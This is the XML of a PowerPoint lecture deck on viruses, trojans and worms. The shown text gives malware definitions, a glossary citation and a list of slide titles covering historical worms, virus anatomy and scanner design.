            </a:fld>
            <a:endParaRPr lang="en-US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4150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9B55-1460-456D-8F62-1DEE4CE04068}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>7</a:t>
            </a:fld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May 25, 2004</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="128006" name="Picture 6" descr="20040525virusStats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295400"/>
            <a:ext cx="7543800" cy="4525963"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
      </p:pic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09600" y="5791200"/>
            <a:ext cx="439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Source: http://www.rav.ro/ravmsstats/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1317-119A-420E-8592-C403B0FCB7ED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Malware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Hard to define precisely.  Popular media additionally distorts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>“Viruses” has come to mean all malware.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>Academicians still try to distinguish among</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>Viruses, Trojans, Worms, ...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Based on Propagation of code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>Benign uses of Viruses, Trojans and Worms are possible.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Viruses, Trojans and Worms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5D0-F1CC-481D-B822-304AC553C303}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/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Viruses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“Officially,” in the sense of ELF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>etc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not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>a program.  Not even a separate file.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Code that will reproduce itself, and ...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Definition from RFC 1135: A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0">
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>virus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t> is a piece of code that inserts itself into a host [program], including operating systems, to propagate. It cannot run independently.  It requires that its host program be run to activate it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Security Glossary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hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.rfc-editor.org/rfc/rfc4949.txt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727</TotalTime>
  <Words>2415</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>433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Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>新細明體</vt:lpstr>
      <vt:lpstr>Lucida Console</vt:lpstr>
      <vt:lpstr>Orbit</vt:lpstr>
      <vt:lpstr>Microsoft Graph 2000 Chart</vt:lpstr>
      <vt:lpstr>Microsoft Photo Editor 3.0 Photo</vt:lpstr>
      <vt:lpstr>Viruses, Trojans, and Worms</vt:lpstr>
      <vt:lpstr>Virus Awareness</vt:lpstr>
      <vt:lpstr>Journal in Computer Virology </vt:lpstr>
      <vt:lpstr>Lies, damned lies and anti-virus statistics?</vt:lpstr>
      <vt:lpstr>Slide 5</vt:lpstr>
      <vt:lpstr>Slide 6</vt:lpstr>
      <vt:lpstr>May 25, 2004</vt:lpstr>
      <vt:lpstr>Malware</vt:lpstr>
      <vt:lpstr>Viruses</vt:lpstr>
      <vt:lpstr>Worm</vt:lpstr>
      <vt:lpstr>Logic Bomb:</vt:lpstr>
      <vt:lpstr>Trapdoor</vt:lpstr>
      <vt:lpstr>Macro Virus</vt:lpstr>
      <vt:lpstr>The Original Trojan Horse</vt:lpstr>
      <vt:lpstr>Trojan Horses</vt:lpstr>
      <vt:lpstr>Types of Propagation</vt:lpstr>
      <vt:lpstr>Normal boot procedure of a PC</vt:lpstr>
      <vt:lpstr>Boot sector viruses</vt:lpstr>
      <vt:lpstr>Multi-partite Viruses</vt:lpstr>
      <vt:lpstr>Payload</vt:lpstr>
      <vt:lpstr>Morris 1988 Internet Worm</vt:lpstr>
      <vt:lpstr>Pikachu Worm 2000</vt:lpstr>
      <vt:lpstr>Melissa Worm 1999</vt:lpstr>
      <vt:lpstr>Melissa Worm</vt:lpstr>
      <vt:lpstr>Melissa Worm</vt:lpstr>
      <vt:lpstr>Melissa Worm</vt:lpstr>
      <vt:lpstr>Melissa Worm</vt:lpstr>
      <vt:lpstr>Melissa Worm</vt:lpstr>
      <vt:lpstr>ILoveYou worm 2000</vt:lpstr>
      <vt:lpstr>ILoveYou Excerpt</vt:lpstr>
      <vt:lpstr>Anatomy of a Virus</vt:lpstr>
      <vt:lpstr>Structure of A Virus</vt:lpstr>
      <vt:lpstr>Case Study: MS-DOS .com Virus</vt:lpstr>
      <vt:lpstr>.com Virus: Conceal via simple XOR encryption</vt:lpstr>
      <vt:lpstr>.com Virus Possible Bombs</vt:lpstr>
      <vt:lpstr>The Linux Virus Writing HOWTO </vt:lpstr>
      <vt:lpstr>Make Viruz, On Demand</vt:lpstr>
      <vt:lpstr>Virus Scanner Design</vt:lpstr>
      <vt:lpstr>Virus Scanners Internals</vt:lpstr>
      <vt:lpstr>Virus Scanners Internals</vt:lpstr>
      <vt:lpstr>Anti-malware Products 2010</vt:lpstr>
      <vt:lpstr>Virus Scanners Today</vt:lpstr>
      <vt:lpstr>Be Very Afraid ...</vt:lpstr>
      <vt:lpstr>Its a Jungle Out There ...</vt:lpstr>
      <vt:lpstr>References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Viruses, Malicious Code, &amp; Other Nasty Stuff</dc:title>
  <dc:creator>Administrator</dc:creator>
  <cp:lastModifiedBy>Prabhaker Mateti</cp:lastModifiedBy>
  <cp:revision>85</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2001-10-02T14:50:58Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2010-06-02T08:10:47Z</dcterms:modified>
</cp:coreProperties>
</file>